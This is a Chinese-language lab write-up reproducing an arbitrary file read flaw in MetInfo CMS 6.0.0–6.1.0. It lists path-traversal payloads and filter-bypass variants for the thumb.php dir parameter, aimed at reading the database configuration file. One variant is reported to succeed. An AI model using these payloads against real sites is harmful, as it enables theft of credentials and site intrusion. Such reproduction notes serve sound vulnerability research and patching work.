metinfo_6.0_file-read

目录

• metinfo_6.0_file-read
  • 漏洞描述
  • 漏洞危害等级
  • 影响版本
  • 漏洞复现
    • 基础环境
    • 环境搭建
    • 漏洞验证
      • payload
      • 第一次绕过payload
      • 第二次绕过payload
      • 第三次绕过payload
  • 漏洞修复

metinfo_6.0_file-read

漏洞描述

MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。

漏洞危害等级

高

影响版本

metinfo 6.0.0
metinfo 6.1.0

漏洞复现

基础环境

组件	版本
OS	2008 R2 x64
WebServer	phpstudy
Source Code	metinfoV6.0

环境搭建

将源码拷贝到Windows2008中解压，

• 修改时区（php.ini）
  timezone变量

解压后访问网站，根据提示安装网站

安装完成后如下↓

漏洞验证

• 漏洞url
  http://192.168.1.10/metinfo_6.0/include/thumb.php
  

payload

?dir=..././http/..././config/config_db.php

第一次绕过payload

?dir=.....///http/.....///config/config_db.php

第二次绕过payload

?dir=http/.....///.....///config/config_db.php

第三次绕过payload

?dir=http\..\..\config\config_db.php

第三个payload成功读取到文件

漏洞修复

升级metinfo版本